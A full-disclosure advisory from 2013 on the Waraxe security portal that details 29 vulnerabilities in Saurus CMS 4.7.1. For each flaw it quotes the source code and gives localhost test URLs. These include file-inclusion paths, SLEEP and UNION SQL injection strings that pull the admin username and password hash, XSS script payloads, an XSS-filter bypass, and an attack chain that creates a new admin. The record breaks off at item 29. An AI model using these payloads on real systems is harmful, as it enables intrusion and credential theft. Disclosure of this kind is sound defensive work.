Waraxe IT Security Portal
Login or Register
September 12, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 74
Members: 0
Total: 74
Full disclosure
CVE-2024-25286 - RedSys - A Cross-Site Request Forgery (CSRF) vulnerability was identified in the Authorization Method of 3DSecure 2.0
CVE-2024-25285 - RedSys - 3DSecure 2.0 is vulnerable to form action hijacking
CVE-2024-25284 - RedSys - Multiple reflected Cross-Site Scripting (XSS) vulnerabilities in the 3DS Authorization Method of 3DSecure 2.0
CVE-2024-25283 - RedSys - Multiple reflected Cross-Site Scripting (XSS) vulnerabilities exist in the 3DS Authorization Challenge of 3DSecure 2.0
CVE-2024-25282 - RedSys - 3DSecure 2.0 is vulnerable to Cross-Site Scripting (XSS) in its 3DSMethod Authentication
KL-001-2024-012: VICIdial Authenticated Remote Code Execution
KL-001-2024-011: VICIdial Unauthenticated SQL Injection
OXAS-ADV-2024-0005: OX App Suite Security Advisory
[SYSS-2024-030]: C-MOR Video Surveillance - OS Command Injection (CWE-78)
[SYSS-2024-029]: C-MOR Video Surveillance - Dependency on Vulnerable Third-Party Component (CWE-1395)
[SYSS-2024-028]: C-MOR Video Surveillance - Cleartext Storage of Sensitive Information (CWE-312)
[SYSS-2024-027]: C-MOR Video Surveillance - Improper Privilege Management (CWE-269)
[SYSS-2024-026]: C-MOR Video Surveillance - Unrestricted Upload of File with Dangerous Type (CWE-434)
[SYSS-2024-025]: C-MOR Video Surveillance - Relative Path Traversal (CWE-23)
Backdoor.Win32.Symmi.qua / Remote Stack Buffer Overflow (SEH)
[waraxe-2013-SA#106] - Multiple Vulnerabilities in Saurus CMS 4.7.1





Author: Janek Vind "waraxe"
Date: 14. July 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-106.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Web publishing system combining daily content management features with site
administration and development tools.

http://www.saurus.info/

Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested:

http://www.saurus.info/version-history/


###############################################################################
1. Local File Inclusion in "admin/fckeditor_dialog_image.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "dialog"
Preconditions:
1. Logged in as Saurus CMS user
2. At least one valid file ID must be known (can be bruteforced)

Php script "admin/fckeditor_dialog_image.php" line 101:
------------------------[ source code start ]----------------------------------
$object = new Objekt(array(
'objekt_id' => (int)$site->fdat['file_id'],
'on_sisu' => 1,
));
...
include_once('../js/fckeditor/editor/'.$site->fdat['dialog']);
------------------------[ source code end ]------------------------------------

Test (parameter "file_id" must be valid):

http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess

Result: contents of ".htaccess" file from Saurus CMS root directory will be
revealed, LFI confirmed.


###############################################################################
2. Local File Inclusion in "extensions/saurus4/captcha_image.php"
###############################################################################

Reason:
1. uninitialized variable "$captcha"
Attack vector:
1. user-supplied parameter "captcha"
Preconditions:
1. PHP setting "register_globals = on"


Php script "extensions/saurus4/captcha_image.php" line 45:
------------------------[ source code start ]----------------------------------
switch ($captcha['image_type'])
{
case 'gif':
include_once($class_path.'lgpl/GotchaGIF.class.php');
$img = new GotchaGIF($captcha['image_width'], $captcha['image_height']);
break;
...
if($img->create())
{
//apply effects
foreach($captcha['effects'] as $effect)
{
$effect_name = $effect['name'];
//echo $effect_name;
include_once($class_path.'lgpl/'.$effect_name.'.class.php');
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/extensions/saurus4/captcha_image.php?
captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&
captcha[effects][0][name]=../waraxe

Result:

Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]:
failed to open stream: No such file or directory in
C:apache_wwwsaurus471extensionssaurus4captcha_image.php on line 73

PHP error message above confirms LFI vulnerability.


###############################################################################
3. Local File Inclusion in "admin/edit.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "extension_path"
Preconditions:
1. Logged in as Saurus CMS user


Php script "admin/edit.php" line 76:
------------------------[ source code start ]----------------------------------
if($site->fdat['extension_path'])
{
$actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php';
...
if (file_exists($actions_file)){
include_once($actions_file);
------------------------[ source code end ]------------------------------------


###############################################################################
4. Remote File Inclusion in "map.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "cmd"
Preconditions:
1. Windows server


Php script "map.php" line 56:
------------------------[ source code start ]----------------------------------
$tmp_cmd=explode("/",$_GET['cmd']);
...
foreach($tmp_cmd as $t){

// if the there is a .php in the URL then don't use aliases go directly to that file
if(preg_match('/.php$/i', $t) && file_exists($t) && !preg_match("#^../#", $t))
...
include($t);
------------------------[ source code end ]------------------------------------

On *nix servers this code above is secure enough, but things change in case of
Windows server - attacker is able to use backslashes, which leads to RFI.

Example attack using local file:

http://localhost/saurus471/map.php?cmd=........ est.php

Example attack using remote file:

http://localhost/saurus471/map.php?cmd=\192.168.1.25 est.php


###############################################################################
5. Remote File Inclusion in "admin/change_config.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"


Php script "admin/change_config.php" line 25:
------------------------[ source code start ]----------------------------------
global $class_path;
...
if(!isset($class_path)) {
$class_path = "../classes/";
}
...
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/?


###############################################################################
6. Remote File Inclusion in "admin/repair_database.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"


Php script "admin/repair_database.php" line 23:
------------------------[ source code start ]----------------------------------
global $class_path;

if(!isset($class_path)) {
$class_path = "../classes/";
}

include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/?


###############################################################################
7. Remote File Inclusion in "admin/check_adminpage.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"


Php script "admin/check_adminpage.php" line 29:
------------------------[ source code start ]----------------------------------
if(!isset($class_path)) { $class_path = "../classes/"; }

include($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/?


###############################################################################
8. SQL Injection in "index.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "pg"
Preconditions:
1. PHP setting "magic_quotes_gpc = Off"


Php script "index.php" line 303:
------------------------[ source code start ]----------------------------------
if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] &&
!$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){
$myid = $_GET['id'] ? $_GET['id'] : $_GET['pg'];
$sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON
keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'";
$sth = new SQL($sql);
$mykeel = $sth->fetchsingle();
------------------------[ source code end ]------------------------------------

As seen above, user-submitted GET parameters "id" and "pg" are checked to be
numeric before using them in SQL query. If we analyze source code more closely,
then it appears to be not as secure as planned by programmer. Attacker can input
GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection
string containing single quote. As parameter "id" is numeric, checking code will
be bypassed. Next line of code tests parameter "id" and because it is zero,
variable "$myid" will get value from parameter "pg". This leads to SQL Injection.

Test 1:

http://localhost/saurus471/?speed_debug=on&id=0&pg=123

Result: "Page was generated in 1.20000 seconds.", normal server response.

Test 2:

http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection
confirmed.


###############################################################################
9. SQL Injection in "classes/sapi/function.init_search_results.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sites"
Preconditions: none


Php script "classes/sapi/function.init_search_results.php" line 27:
------------------------[ source code start ]----------------------------------
function smarty_function_init_search_results($params,&$smarty) {
...
if(!isset($sites)) $sites = $site->fdat['sites'];
...
$pre_search_explode=explode(",",strtolower(trim($sites)));
foreach($pre_search_explode as $k=>$v){
$pre_search_explode[$k]=trim($v);
}
$sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')";
...
$sth = new SQL($sql_keel);
while($r = $sth->fetch("ASSOC")){
$keeled[]=$r['keel_id'];
------------------------[ source code end ]------------------------------------

As seen above, user-submitted parameter "sites" ends up used in SQL query
without proper sanitization, which leads to SQL Injection vulnerability.

Test 1:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe

Result: "Page was generated in 1.18560 seconds.", normal server response.

Test 2:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection
confirmed.


###############################################################################
10. SQL Injection in "admin/error_log.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/error_log.php" line 63:
------------------------[ source code start ]----------------------------------
$algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d);
$lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y");
...
if ($algus_aeg) {
$where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' ";
}
if ($lopp_aeg) {
$where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' ";
}
if ($site->fdat['err_type']) {
$where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' ";
}
...
$where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : '';
...
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC';
...
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
...
$sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*");
$sql .= $from_sql;
$sql .= $where_str;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
...
$sth = new SQL($sql);
...
while ( $log = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23

Result:

MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23


Result:

Username and password hash of the Saurus CMS user with ID 1 will be revealed


###############################################################################
11. SQL Injection in "admin/extensions.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/extensions.php" line 297:
------------------------[ source code start ]----------------------------------
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC';
...
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
...
$sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*");
$sql .= $from_sql;
$sql .= $order;
...
$sth = new SQL($sql);
...
while ( $ext = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/extensions.php?sortby=1

Result: normal server response, no additional delay.

Test 2:

http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23

Result: additionial delay observed, SQL Injection confirmed.


###############################################################################
12. SQL Injection in "admin/profile_data.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/profile_data.php" line 521:
------------------------[ source code start ]----------------------------------
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
...
$sql .= $from_sql;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
$sth = new SQL($sql);
...
if($sth->rows){
...
while($asset = $sth->fetch()){
------------------------[ source code end ]------------------------------------


###############################################################################
13. SQL Injection in "classes/user_html.inc.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "classes/user_html.inc.php" line 313:
------------------------[ source code start ]----------------------------------
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
...
$sql = $site->db->prepare("SELECT users.* FROM users ");
$sql .= $join;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
...
$sth = new SQL($sql);
...
while($tmp = $sth->fetch()){
------------------------[ source code end ]------------------------------------

###############################################################################
14. SQL Injection in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sst_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/sys_sonad_loetelu.php" line 123:
------------------------[ source code start ]----------------------------------
$sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']);

if(is_numeric($site->fdat['flt_keel']))
{
...
$otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR
sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE
'%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR
sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id;
$where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ",
$keel_id,
1
);
...
$sql .= $where_str;
...
$sth = new SQL($sql);
...
while ( $mysona = $sth->fetch('ASSOC') )
{
$words[] = $mysona;
}
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23

Result:

MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23

Result:

Username and password hash of the Saurus CMS user with ID 1 will be revealed


###############################################################################
15. SQL Injection in "admin/change_config.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "timezone"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/change_config.php" line 153:
------------------------[ source code start ]----------------------------------
$q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'";
new SQL($q);
------------------------[ source code end ]------------------------------------


###############################################################################
16. Stored XSS in "admin/log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "user"
Preconditions:
1. 1. "Enable site log" enabled (it is by default)


Php script "classes/site.class.php" line 538:
------------------------[ source code start ]----------------------------------
if($this->fdat["op"] == 'login' && $this->fdat["url"] &&
$this->CONF['disable_form_based_login'] != "1") {
$this->user = new User(array(
user => $this->fdat["user"],
pass => $this->fdat["pass"],
"site" => &$this,
));
$user_id = $this->user->user_id;

if ($user_id) {
...
else {
# kirjuta logi
new Log(array(
'action' => 'log in',
'component' => 'Users',
'type' => 'NOTICE',
'message' => "Unauthorized access to CMS:
username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'",
));
------------------------[ source code end ]------------------------------------

As seen above, in case of failed login attempt site log entry will be created,
containing various information, including submitted username.


Php script "admin/log.php" line 265:
------------------------[ source code start ]----------------------------------
<?php foreach ($log_records as $log_record) { //printr($log_record); ?>
...
<td><?=$log_record['message'];?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for sitelog view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion,
2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin
account creation, 4. attacker logs in as new admin, game over ...

Test:

1. Issue GET request as below:

http://localhost/saurus471/admin/?op=login&url=1&user=<script>alert(123);</script>

2. Log in as Saurus CMS admin and open site log page:

http://localhost/saurus471/admin/log.php

Result:

javascript alert box pops up, confirming Stored XSS vulnerability.


###############################################################################
17. Stored XSS in "admin/error_log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Preconditions:
1. "Save PHP and MySQL errors into the database" enabled (it is by default)


Php script "classes/port.inc.php" line 150:
------------------------[ source code start ]----------------------------------
function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){
...
if (!defined("SAVE_ERROR_LOG")){

$res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'");
if ($res){
list($tmp) = @mysql_fetch_array($res);
}
define("SAVE_ERROR_LOG", ($tmp ? 1:0));
}


if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){
@mysql_query("INSERT INTO error_log (time_of_error, source, err_text,
err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(),
'".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."',
'PHP', '".addslashes($_SERVER['HTTP_HOST'])."',
'".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat).
"', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')");
}
}

}

# Redefine error handler
$old_error_handler = set_error_handler("saurusErrorHandler");
------------------------[ source code end ]------------------------------------

As seen above, new PHP error handler is defined, which writes all PHP error
messages to error log in database.


Php script "admin/error_log.php" line 320:
------------------------[ source code start ]----------------------------------
<td width="60%"><?= $log['err_text'] ?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for error log view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise by similar scenario as described in previous case.

Test:

1. Issue GET request as below (MySQL Injection from one of the previous cases):

http://localhost/saurus471/?id=0&pg='<script>alert(123);</script>

2. Log in as Saurus CMS admin and open erro log page:

http://localhost/saurus471/admin/error_log.php

Result:

javascript alert box pops up, confirming Stored XSS vulnerability.


###############################################################################
18. XSS protection bypass in "classes/port.inc.php"
###############################################################################

Php script "classes/port.inc.php" line 536:
------------------------[ source code start ]----------------------------------
if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && (
detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) ||
detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) ||
detect_xss_in_string($_SERVER['PHP_SELF']) ||
detect_xss_in_saurus_params($_POST) ||
detect_xss_in_saurus_params($_GET))
)
{
header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php');
exit;
}
------------------------[ source code end ]------------------------------------

We can see, that XSS detection functions are used against various input parameters
and in case of positive hit redirection to home page follows. There is custom
exclusion in place for administrative scripts and it's implementation is not
secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string
in URI and XSS detection will be bypassed.
String for XSS detection bypass is "/saurus471/admin/" in examples below.

Test 1:

http://localhost/saurus471/kalender.php?month=<script>

Result: XSS detected, redirection follows

Test 2:

http://localhost/saurus471/kalender.php?/saurus471/admin/&month=<script>

Result: XSS not detected, no redirection


###############################################################################
19. Reflected XSS in "kalender.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions: none


Php script "kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.value=selected_date;
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.focus();
...
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
$month = $site->fdat['month'];
...
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
20. Reflected XSS in "editor/kalender.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions:
1. must be logged in as user


Php script "editor/kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.value=selected_date;
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.focus();
...
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
$month = $site->fdat['month'];
...
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/editor/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
21. Reflected XSS in "admin/delete_log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "tbl"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/delete_log.php" line 176:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="tbl" value="<?=$site->fdat['tbl']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/delete_log.php?tbl="><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
22. Reflected XSS in "admin/edit_adminpage.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "id" and "op"
Preconditions:
1. logged in as Saurus CMS admin


Tests:

http://localhost/saurus471/admin/edit_adminpage.php?id="><script>alert(123);</script>
http://localhost/saurus471/admin/edit_adminpage.php?op="><script>alert(123);</script>

Results:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
23. Reflected XSS in "admin/edit_group.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "group_id"
Preconditions:
1. logged in as Saurus CMS admin


Tests:

http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"><script>alert(123);</script>

Result:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
24. Reflected XSS in "admin/profile_data.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/profile_data.php" line 65:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['profile_id']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profile_data.php?profile_id=<script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
25. Reflected XSS in "admin/edit_object.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/edit_object.php" line 101:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$profile_id."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
26. Reflected XSS in "admin/edit_profile.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "pid"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/edit_profile.php" line 997:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['pid']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=<script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
27. Reflected XSS in "admin/profiles.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "profile_id", "source_table", "did"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/profiles.php" line 247:
------------------------[ source code start ]----------------------------------
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
('edit_profile.php?op=newdef&pid=<?= $site->fdat['profile_id'] ?>
...
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
('edit_profile.php?op=new&pid=<?= $site->fdat['profile_id']?>
&source_table=<?= $site->fdat['source_table']?>
...
<TD nowrap><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=edit&pid=<?= $site->fdat['profile_id']?>
&did=<?= $site->fdat['did']?>'
...
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=delete&pid=<?= $site->fdat['profile_id']?>
...
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=duplicate&pid=<?= $site->fdat['profile_id']?>
&did=<?=$site->fdat['did']?>'
...
<TD><a href="<?= $site->self ?>?profile_id=<?= $site->fdat['profile_id']?>&op=sync"
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profiles.php?profile_id="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?source_table="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?profile_id=z&did="><script>alert(123);</script>

Results:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
28. Reflected XSS in "admin/sys_alias.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
1. logged in as Saurus CMS admin


Test:

http://localhost/saurus471/admin/sys_alias.php?flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/sys_alias.php?keel_id="><script>alert(123);</script>

Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
29. Reflected XSS in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "flt_keel"
Preconditions:
1. logged in as Saurus CMS admin


Test:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=</script><script>alert(123);</script>

Result:

